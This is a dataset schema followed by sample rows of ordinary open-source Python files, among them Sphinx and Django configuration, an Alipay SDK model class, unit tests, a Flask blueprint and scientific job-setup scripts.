Dataset schema (29 columns; dtype and observed min/max per column, ⌀ = contains nulls):

- blob_id: string, length 40
- directory_id: string, length 40
- path: string, length 3–616
- content_id: string, length 40
- detected_licenses: sequence, length 0–112
- license_type: string, 2 classes
- repo_name: string, length 5–115
- snapshot_id: string, length 40
- revision_id: string, length 40
- branch_name: string, 777 classes
- visit_date: timestamp[us], 2015-08-06 10:31:46 to 2023-09-06 10:44:38
- revision_date: timestamp[us], 1970-01-01 02:38:32 to 2037-05-03 13:00:00
- committer_date: timestamp[us], 1970-01-01 02:38:32 to 2023-09-06 01:08:06
- github_id: int64, 4.92k–681M, ⌀
- star_events_count: int64, 0–209k
- fork_events_count: int64, 0–110k
- gha_license_id: string, 22 classes
- gha_event_created_at: timestamp[us], 2012-06-04 01:52:49 to 2023-09-14 21:59:50, ⌀
- gha_created_at: timestamp[us], 2008-05-22 07:58:19 to 2023-08-21 12:35:19, ⌀
- gha_language: string, 149 classes
- src_encoding: string, 26 classes
- language: string, 1 class
- is_vendor: bool, 2 classes
- is_generated: bool, 2 classes
- length_bytes: int64, 3–10.2M
- extension: string, 188 classes
- content: string, length 3–10.2M
- authors: sequence, length 1
- author_id: string, length 1–132
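A minimal sketch of how a shard with this schema could be loaded and filtered with the Hugging Face `datasets` library; the parquet file name below is a placeholder assumption, not a path given by this card:

```python
# Minimal sketch, assuming a local parquet shard with the schema above.
# "train-00000.parquet" is a hypothetical file name, not from this card.
from datasets import load_dataset

ds = load_dataset("parquet", data_files="train-00000.parquet", split="train")

# Keep permissively licensed files that are neither vendored nor generated.
subset = ds.filter(
    lambda row: row["license_type"] == "permissive"
    and not row["is_vendor"]
    and not row["is_generated"]
)

row = subset[0]
print(row["repo_name"], row["path"], row["length_bytes"])
```

Each row below pairs this metadata with the full file `content`.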
6c4ea1a55aa1857a24e8392dc9ee83a4a26653d2 | e29409a3128165f1cd9d698c3b44e883b23a518e | /doc/conf.py | 27d308bdcfb17afbd685096ed676923609206b51 | [
"BSD-2-Clause"
] | permissive | renefritze/nb2plots | e5b69e2e8fdcb947f44833e7a2fb7df76e079086 | ad269b151c746eb0072aa8f03a31121a39012522 | refs/heads/master | 2020-09-21T18:19:09.267839 | 2019-12-05T12:14:56 | 2019-12-05T15:53:18 | 224,879,955 | 0 | 0 | NOASSERTION | 2019-11-29T15:35:20 | 2019-11-29T15:35:20 | null | UTF-8 | Python | false | false | 10,244 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# nb2plots documentation build configuration file, created by
# sphinx-quickstart on Fri Dec 16 08:41:58 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.mathjax',
'sphinx.ext.githubpages',
'texext.math_dollar',
'numpydoc',
'nb2plots',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'nb2plots'
copyright = '2016-2018, Matthew Brett'
author = 'Matthew Brett'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
import nb2plots
release = nb2plots.__version__
# The short X.Y version.
version = '.'.join(release.split('.')[:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#
# today = ''
#
# Else, today_fmt is used as the format for a strftime call.
#
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', 'README.rst']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#
# html_title = 'nb2plots v0.4'
# A shorter title for the navigation bar. Default is the same as html_title.
#
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#
# html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#
# html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#
# html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#
# html_additional_pages = {}
# If false, no module index is generated.
#
# html_domain_indices = True
# If false, no index is generated.
#
# html_use_index = True
# If true, the index is split into individual pages for each letter.
#
# html_split_index = False
# If true, links to the reST sources are added to the pages.
#
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr', 'zh'
#
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' users can customize the `jieba` dictionary path.
#
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'nb2plotsdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'nb2plots.tex', 'nb2plots Documentation',
'Matthew Brett', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#
# latex_use_parts = False
# If true, show page references after internal links.
#
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
#
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
#
# latex_appendices = []
# If false, will not define \strong, \code, \titleref, \crossref ... but only
# \sphinxstrong, ..., \sphinxtitleref, ... To help avoid clash with user added
# packages.
#
# latex_keep_old_macro_names = True
# If false, no module index is generated.
#
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'nb2plots', 'nb2plots Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'nb2plots', 'nb2plots Documentation',
author, 'nb2plots', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#
# texinfo_appendices = []
# If false, no module index is generated.
#
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#
# texinfo_no_detailmenu = False
markdown_http_base = 'https://matthew-brett.github.io/nb2plots'
# Doctest configuration. Use older numpy array representation.
doctest_global_setup = 'from nb2plots.testing import setup_test; setup_test()'
| [
"[email protected]"
] | |
40c2680cba8adb4f45b6f169538fa7388bd4ffaf | ccd1dced3b39f970c4d1b41f03d372b71a360194 | /property/migrations/0007_category_image.py | ab56a4074b926265ba07b2dd955a4f49c3fd6011 | [] | no_license | joescaos/hotel-ecommerce-site | 5ab815f85b7e4d09a06b963a7785010c068a24d8 | 0b40aaf73d0d6241df88fa4dfe6fa63d868ee9aa | refs/heads/master | 2022-09-29T07:59:02.474986 | 2020-06-06T00:51:55 | 2020-06-06T00:51:55 | 269,823,623 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | # Generated by Django 3.0.5 on 2020-05-31 01:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('property', '0006_auto_20200521_2139'),
]
operations = [
migrations.AddField(
model_name='category',
name='image',
field=models.ImageField(null=True, upload_to='category/'),
),
]
| [
"[email protected]"
] | |
b8e08f8929644608f02c3d6e6fc8a410cd9c05cd | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/domain/AlipayFundEnterprisepayMemberModifyModel.py | d1d2f85425b69bf336ad21837ecf8dd2b333fe2d | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 6,152 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.FundExtInfo import FundExtInfo
class AlipayFundEnterprisepayMemberModifyModel(object):
def __init__(self):
self._account_id = None
self._agreement_no = None
self._biz_scene = None
self._fund_ext_info = None
self._group_id_list = None
self._open_id = None
self._operation_type_list = None
self._product_code = None
self._user_id = None
@property
def account_id(self):
return self._account_id
@account_id.setter
def account_id(self, value):
self._account_id = value
@property
def agreement_no(self):
return self._agreement_no
@agreement_no.setter
def agreement_no(self, value):
self._agreement_no = value
@property
def biz_scene(self):
return self._biz_scene
@biz_scene.setter
def biz_scene(self, value):
self._biz_scene = value
@property
def fund_ext_info(self):
return self._fund_ext_info
@fund_ext_info.setter
def fund_ext_info(self, value):
if isinstance(value, FundExtInfo):
self._fund_ext_info = value
else:
self._fund_ext_info = FundExtInfo.from_alipay_dict(value)
@property
def group_id_list(self):
return self._group_id_list
@group_id_list.setter
def group_id_list(self, value):
if isinstance(value, list):
self._group_id_list = list()
for i in value:
self._group_id_list.append(i)
@property
def open_id(self):
return self._open_id
@open_id.setter
def open_id(self, value):
self._open_id = value
@property
def operation_type_list(self):
return self._operation_type_list
@operation_type_list.setter
def operation_type_list(self, value):
if isinstance(value, list):
self._operation_type_list = list()
for i in value:
self._operation_type_list.append(i)
@property
def product_code(self):
return self._product_code
@product_code.setter
def product_code(self, value):
self._product_code = value
@property
def user_id(self):
return self._user_id
@user_id.setter
def user_id(self, value):
self._user_id = value
def to_alipay_dict(self):
params = dict()
if self.account_id:
if hasattr(self.account_id, 'to_alipay_dict'):
params['account_id'] = self.account_id.to_alipay_dict()
else:
params['account_id'] = self.account_id
if self.agreement_no:
if hasattr(self.agreement_no, 'to_alipay_dict'):
params['agreement_no'] = self.agreement_no.to_alipay_dict()
else:
params['agreement_no'] = self.agreement_no
if self.biz_scene:
if hasattr(self.biz_scene, 'to_alipay_dict'):
params['biz_scene'] = self.biz_scene.to_alipay_dict()
else:
params['biz_scene'] = self.biz_scene
if self.fund_ext_info:
if hasattr(self.fund_ext_info, 'to_alipay_dict'):
params['fund_ext_info'] = self.fund_ext_info.to_alipay_dict()
else:
params['fund_ext_info'] = self.fund_ext_info
if self.group_id_list:
if isinstance(self.group_id_list, list):
for i in range(0, len(self.group_id_list)):
element = self.group_id_list[i]
if hasattr(element, 'to_alipay_dict'):
self.group_id_list[i] = element.to_alipay_dict()
if hasattr(self.group_id_list, 'to_alipay_dict'):
params['group_id_list'] = self.group_id_list.to_alipay_dict()
else:
params['group_id_list'] = self.group_id_list
if self.open_id:
if hasattr(self.open_id, 'to_alipay_dict'):
params['open_id'] = self.open_id.to_alipay_dict()
else:
params['open_id'] = self.open_id
if self.operation_type_list:
if isinstance(self.operation_type_list, list):
for i in range(0, len(self.operation_type_list)):
element = self.operation_type_list[i]
if hasattr(element, 'to_alipay_dict'):
self.operation_type_list[i] = element.to_alipay_dict()
if hasattr(self.operation_type_list, 'to_alipay_dict'):
params['operation_type_list'] = self.operation_type_list.to_alipay_dict()
else:
params['operation_type_list'] = self.operation_type_list
if self.product_code:
if hasattr(self.product_code, 'to_alipay_dict'):
params['product_code'] = self.product_code.to_alipay_dict()
else:
params['product_code'] = self.product_code
if self.user_id:
if hasattr(self.user_id, 'to_alipay_dict'):
params['user_id'] = self.user_id.to_alipay_dict()
else:
params['user_id'] = self.user_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayFundEnterprisepayMemberModifyModel()
if 'account_id' in d:
o.account_id = d['account_id']
if 'agreement_no' in d:
o.agreement_no = d['agreement_no']
if 'biz_scene' in d:
o.biz_scene = d['biz_scene']
if 'fund_ext_info' in d:
o.fund_ext_info = d['fund_ext_info']
if 'group_id_list' in d:
o.group_id_list = d['group_id_list']
if 'open_id' in d:
o.open_id = d['open_id']
if 'operation_type_list' in d:
o.operation_type_list = d['operation_type_list']
if 'product_code' in d:
o.product_code = d['product_code']
if 'user_id' in d:
o.user_id = d['user_id']
return o
| [
"[email protected]"
] | |
8dd0a54e2c18cc359f8bbc9a5a06659f45269823 | 4efd4fe7e848dc5973e350516ebfb57be015f5b6 | /inline_media/tests/parser.py | 111038f50b1f76514967b44f63baef82dc66db13 | [
"BSD-2-Clause",
"CC-BY-2.5"
] | permissive | MechanisM/django-inline-media | 468648eb7a8b909a4204fc3c05788a73988a7855 | e3ef3def173bcc9ac540123afe467894b635db85 | refs/heads/master | 2021-01-19T08:23:07.228198 | 2012-02-22T18:09:10 | 2012-02-22T18:09:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,221 | py | #-*- coding: utf-8 -*-
import os
import shutil
import tempfile
from django.contrib.contenttypes.models import ContentType
from django.test import TestCase as DjangoTestCase
from inline_media.models import InlineType
from inline_media.parser import MySoup, inlines, render_inline
from inline_media.widgets import TextareaWithInlines
from inline_media.tests.models import MediaModelTest
selfClosingTags = ['inline','img','br','input','meta','link','hr']
class ParserTestCase(DjangoTestCase):
def setUp(self):
test_content_type = ContentType.objects.get(app_label="tests", model="modeltest")
InlineType.objects.create(title="testobj", content_type=test_content_type)
self.obj = MediaModelTest.objects.create(title="The Title", description="Blah blah ...")
self.tag = u'<inline type="%(type)s" id="%(id)d" class="%(class)s" />' % {
"type": "tests.mediamodeltest", "id": self.obj.id, "class": "inline_small_left" }
def test_render_inline(self):
soup = MySoup(self.tag, selfClosingTags=selfClosingTags)
rendered_inline = render_inline(soup.find("inline"))
self.assert_(rendered_inline.get("context", None) != None)
self.assert_(rendered_inline.get("template", None) != None)
self.assert_(rendered_inline["context"]["object"] == self.obj)
self.assert_(rendered_inline["context"]["class"] == u'inline_small_left')
self.assert_(rendered_inline["context"]["content_type"] == u'tests.mediamodeltest')
self.assert_(rendered_inline["template"] == u'inline_media/tests_mediamodeltest.html')
def test_inlines_with_return_list_false(self):
html_content = inlines(self.tag, return_list=False)
self.assertEqual(
'<div class="inline_small_left"><H3>The Title</H3><p>Blah blah ...</p></div>\n',
html_content)
def test_inlines_with_return_list_true(self):
inline_list = inlines(self.tag, return_list=True)
self.assert_(len(inline_list) == 1)
self.assert_(inline_list[0]["object"] == self.obj)
self.assert_(inline_list[0]["class"] == u'inline_small_left')
self.assert_(inline_list[0]["content_type"] == u'tests.mediamodeltest')
| [
"[email protected]"
] | |
ae75a4e4e98e779462934871276bedbdd4d46e90 | 431a1f738b1edfba7dad8d10a6b7520d51d917cb | /Samples/UserSamples/2018/ggH_Splits/ggH2Config.py | 88310b478b17319c11136fe426fcd9265a083a66 | [] | no_license | aloeliger/DatacardCreator | 5ce702e46fbb77e843b44d8fe088c2645a4a8f66 | 5c7e890276a5be079ed3b677a471c1dcadcba52d | refs/heads/master | 2022-02-26T19:52:30.563747 | 2022-02-16T20:24:48 | 2022-02-16T20:24:48 | 215,602,523 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,253 | py | from Samples.SampleDefinition import Sample
from Samples.Uncertainties.UserUncertainties.TES import TESUncertainty
from Samples.Uncertainties.UserUncertainties.JES import JESUncertainty
from Samples.Uncertainties.UserUncertainties.ggHTheory import ggHTheoryUncertainty
from Samples.Uncertainties.UserUncertainties.MetRecoil import MetRecoilUncertainty
from Samples.Uncertainties.UserUncertainties.MuonES import MuonESUncertainty
from Samples.Uncertainties.UserUncertainties.TauID import TauIDUncertainty
from Samples.Uncertainties.UserUncertainties.Trigger17_18 import Trigger1718Uncertainty
from Samples.EventDefinition.UserEventDictionaries.MuTauEventDictionary import MuTauEventDictionary
ggHSample = Sample()
ggHSample.name = 'ggH_htt125'
ggHSample.path = '/data/aloeliger/SMHTT_Selected_2018_Deep/'
ggHSample.files = ['ggH.root']
ggHSample.definition = ''
ggHSample.uncertainties = [
TESUncertainty(),
JESUncertainty(),
ggHTheoryUncertainty(),
MetRecoilUncertainty(),
MuonESUncertainty(),
TauIDUncertainty(),
Trigger1718Uncertainty(),
]
ggHSample.eventDictionaryInstance = MuTauEventDictionary
ggHSample.CreateEventWeight = ggHSample.CreateEventWeight_Standard
ggHSample.startEntry = 30100
ggHSample.endEntry = 60200
| [
"[email protected]"
] | |
8e37aac511b0cae4341fac4bc5e433d598934167 | f3b233e5053e28fa95c549017bd75a30456eb50c | /mcl1_input/L41/41-35_wat_20Abox/set_2.py | 0d09b429cc615aa8547489fd53727cb51b0633aa | [] | no_license | AnguseZhang/Input_TI | ddf2ed40ff1c0aa24eea3275b83d4d405b50b820 | 50ada0833890be9e261c967d00948f998313cb60 | refs/heads/master | 2021-05-25T15:02:38.858785 | 2020-02-18T16:57:04 | 2020-02-18T16:57:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 738 | py | import os
dir = '/mnt/scratch/songlin3/run/mcl1/L41/wat_20Abox/ti_one-step/41_35/'
filesdir = dir + 'files/'
temp_prodin = filesdir + 'temp_prod_2.in'
temp_pbs = filesdir + 'temp_2.pbs'
lambd = [ 0.00922, 0.04794, 0.11505, 0.20634, 0.31608, 0.43738, 0.56262, 0.68392, 0.79366, 0.88495, 0.95206, 0.99078]
for j in lambd:
os.chdir("%6.5f" %(j))
workdir = dir + "%6.5f" %(j) + '/'
#prodin
prodin = workdir + "%6.5f_prod_2.in" %(j)
os.system("cp %s %s" %(temp_prodin, prodin))
os.system("sed -i 's/XXX/%6.5f/g' %s" %(j, prodin))
#PBS
pbs = workdir + "%6.5f_2.pbs" %(j)
os.system("cp %s %s" %(temp_pbs, pbs))
os.system("sed -i 's/XXX/%6.5f/g' %s" %(j, pbs))
#submit pbs
#os.system("qsub %s" %(pbs))
os.chdir(dir)
| [
"[email protected]"
] | |
3d11100956a6fec50f50a061926d77f2677a4c40 | a62d603a0b31ccd77f9b2035c2740d4d25f2408d | /artistforum/artistforum/urls.py | b2b0502da749d37a8d5dbe8825c2d844170f78a6 | [] | no_license | shushantkumar/Projects | 44751949c2787e1ae4bb3909e0b37a6210680352 | e6ce305dc80ec7bd258e213271d0292f8f1e3cfd | refs/heads/master | 2021-01-02T22:34:35.854166 | 2018-04-22T07:30:37 | 2018-04-22T07:30:37 | 99,346,113 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,096 | py | """artistforum URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from django.conf.urls import url
# from artist.views import redirectToAuth,yellowantRedirectUrl
from artist.views import redirectToAuth,yellowantRedirectUrl
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('artist.urls')),
path('getyaauthurl/',redirectToAuth,name='redirectToAuth'),
path('redirecturl/',yellowantRedirectUrl, name = 'yellowantRedirectUrl')
]
| [
"[email protected]"
] | |
5ced8005d7ca2b0d24eada8cddaa00c4a3825af9 | 696c1a00fbf09da67c37de2406c5394a5edcb166 | /tests/combined_model_tests/combined_model_tests.py | 4854a4daeffff3293082bec9ada559fe26bfd617 | [] | no_license | mengyx-work/xgboost_hyperopt | 7f52c5aa3fff81d029e3879630b373d79c4155bb | bbd80c489cb308309d45f1de1cc2676b13e29b6b | refs/heads/master | 2021-01-15T15:41:38.622028 | 2017-05-14T21:05:46 | 2017-05-14T21:05:46 | 55,736,994 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,312 | py | import pandas as pd
import numpy as np
import os, sys, time
import yaml
import cPickle as pickle
sys.path.append('/home/ymm/kaggle/xgboost_hyperopt')
from utils.bosch_functions import load_processed_bosch_data
from utils.models import CombinedModel
from utils.validation_tools import score_MCC, MCC, create_validation_index, cross_validate_model
dep_var_name = 'Response'
## params for combined model
raw_models_yaml_file = 'raw_combined_models.yml'
trained_model_yaml_file = 'trained_combined_model.yml'
project_path = './tmp'
raw_models_yaml_path = './'
## 15 bins data
project_yml_path = '/mnt/home/ymm/kaggle/compete/current'
data_path = '/home/ymm/kaggle/bosch_data/bosch_complete_processed_15_bins_data'
data_yaml_file = 'bosch_processed_data_dict.yml'
train = load_processed_bosch_data(data_path, data_yaml_file, data_index='0', nrows=10000)
## train the comined model
combined_model_params = {}
combined_model_params['raw_models_yaml_file'] = raw_models_yaml_file
combined_model_params['raw_models_yaml_path'] = raw_models_yaml_path
combined_model_params['project_path'] = project_path
combined_model_params['models_yaml_file'] = trained_model_yaml_file
## build the combined model
combined_model = CombinedModel(combined_model_params)
## warning! the multiple combined tests will overwite each ohter's results
#'''
############## Section of regular validation #######################
train_index, valid_index = create_validation_index(train, 0.5, dep_var_name, True)
valid_data = train.ix[valid_index]
tmp_train = train.ix[train_index]
combined_model.fit(train, dep_var_name)
pred_df = combined_model.predict(valid_data)
print 'MCC score from validation: ', MCC(valid_data[dep_var_name], pred_df)
#print score_MCC(valid_data[dep_var_name], pred_df)
#'''
#'''
############## Section of using cross validation #######################
## cross-validate any combined model
results = cross_validate_model(train, dep_var_name, combined_model, score_MCC, 3)
print results
#'''
############## Section of cross_valiate fit #######################
combined_model.cross_vlidate_fit(train, dep_var_name)
pred_df = combined_model.predict(valid_data, score_conversion_type='A')
print 'MCC score from cross_valiate_fit: ', MCC(valid_data[dep_var_name], pred_df)
| [
"[email protected]"
] | |
7168d5ad5f15baa04059a1819cae512b8d6ccff2 | cf4e5165a8408344a4c62e63a0fd2d0fe6308b37 | /15期/15 flask框架/13-使用蓝图划分模块/orders.py | a78452943880b1d6638e7eeb4f45bfaf6f0516f5 | [] | no_license | kennycaiguo/Heima-Python-2018 | 5f8c340e996d19f2b5c44d80ee7c144bf164b30e | a8acd798f520ec3d079cc564594ebaccb9c232a0 | refs/heads/master | 2021-01-08T10:54:18.937511 | 2019-09-01T14:37:49 | 2019-09-01T14:37:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 331 | py | # coding=utf-8
from flask import Flask, Blueprint
# Create a blueprint object; a blueprint is essentially a small, self-contained module
app_orders = Blueprint("app_orders", __name__, template_folder="templates")
@app_orders.route("/get_orders")
def get_orders():
return "get orders page"
@app_orders.route("post_orders")
def post_orders():
    return "post orders page"  # placeholder response; a Flask view must not return None
| [
"[email protected]"
] | |
a849ea55c243f6df2ba62ce912a03beb7a554c9b | bfc0a74a378d3692d5b033c21c29cf223d2668da | /unittests/pytests/utils/TestPylith.py | de1c2d7ed43609cfec1e7c351ee3ff7dead84b91 | [
"MIT"
] | permissive | rishabhdutta/pylith | b2ed9cd8039de33e337c5bc989e6d76d85fd4df1 | cb07c51b1942f7c6d60ceca595193c59a0faf3a5 | refs/heads/master | 2020-12-29T01:53:49.828328 | 2016-07-15T20:34:58 | 2016-07-15T20:34:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,347 | py | #!/usr/bin/env python
#
# ======================================================================
#
# Brad T. Aagaard, U.S. Geological Survey
# Charles A. Williams, GNS Science
# Matthew G. Knepley, University of Chicago
#
# This code was developed as part of the Computational Infrastructure
# for Geodynamics (http://geodynamics.org).
#
# Copyright (c) 2010-2016 University of California, Davis
#
# See COPYING for license information.
#
# ======================================================================
#
## @file unittests/pytests/utils/TestPylith.py
## @brief Unit testing of Pylith module.
import unittest
# ----------------------------------------------------------------------
class TestPylith(unittest.TestCase):
"""
Unit testing of Pylith object.
"""
def test_sizeofVoidPtr(self):
"""
Test sizeofVoidPtr().
"""
from pylith.utils.utils import sizeofVoidPtr
size = sizeofVoidPtr()
return
def test_sizeofPylithScalar(self):
"""
Test sizeofPylithScalar().
"""
from pylith.utils.utils import sizeofPylithScalar
size = sizeofPylithScalar()
self.failUnless(4 == size or 8 == size)
return
def test_isCUDAEnabled(self):
"""
Test constructor.
"""
from pylith.utils.utils import isCUDAEnabled
value = isCUDAEnabled()
return
# End of file
| [
"[email protected]"
] | |
cccc2caec8badcd13bf957235949812bb9349150 | 6ed48bf3c72e61fe53144a3545ab305112c93501 | /appengine/findit/util_scripts/remote_api.py | d49a94ae16abf3e15f56036cd09699fb730490c3 | [
"BSD-3-Clause"
] | permissive | eunchong/infra | ee5f7a9379977de8c814f90dbba3f6adbf06a75c | ce3728559112bfb3e8b32137eada517aec6d22f9 | refs/heads/master | 2022-11-27T06:26:57.415805 | 2016-04-08T12:34:36 | 2016-04-08T12:34:36 | 55,699,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,991 | py | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This module is used to set up Remote API to use services on App Engine.
After setup, available services include datastore, task queue, etc.
You may be prompted for credentials during the remote query or the like.
You can use the Remote API only if you are one of the project members.
For detail on usage of Remote API, please refer to:
https://cloud.google.com/appengine/docs/python/tools/remoteapi
"""
import os
import socket
import sys
_FINDIT_ROOT_DIR = os.path.join(os.path.dirname(__file__), os.path.pardir)
_APPNGINE_SDK_DIR = os.path.join(_FINDIT_ROOT_DIR, os.path.pardir,
os.path.pardir, os.path.pardir,
'google_appengine')
# Add App Engine SDK dir to sys.path.
sys.path.insert(1, _APPNGINE_SDK_DIR)
import dev_appserver
dev_appserver.fix_sys_path()
# Add Findit root dir to sys.path so that modules in Findit would be available.
sys.path.insert(1, _FINDIT_ROOT_DIR)
from google.appengine.api import urlfetch
from google.appengine.ext import ndb
from google.appengine.ext.remote_api import remote_api_stub
def SetTimeoutForUrlOperations(url_blocking_operations_timeout=600):
"""Set timeout for url operations (socket, appengine db)."""
socket.setdefaulttimeout(url_blocking_operations_timeout)
urlfetch.set_default_fetch_deadline(url_blocking_operations_timeout)
def EnableRemoteApi(app_id='findit-for-me'):
"""Enable appengine services through remote API.
Args:
app_id (str): The appengine ID without '.appspot.com', eg. findit-for-me.
"""
if hasattr(EnableRemoteApi, app_id):
return
SetTimeoutForUrlOperations()
remote_api_stub.ConfigureRemoteApiForOAuth(
'%s.appspot.com' % app_id,
'/_ah/remote_api',
secure=True,
save_cookies=True)
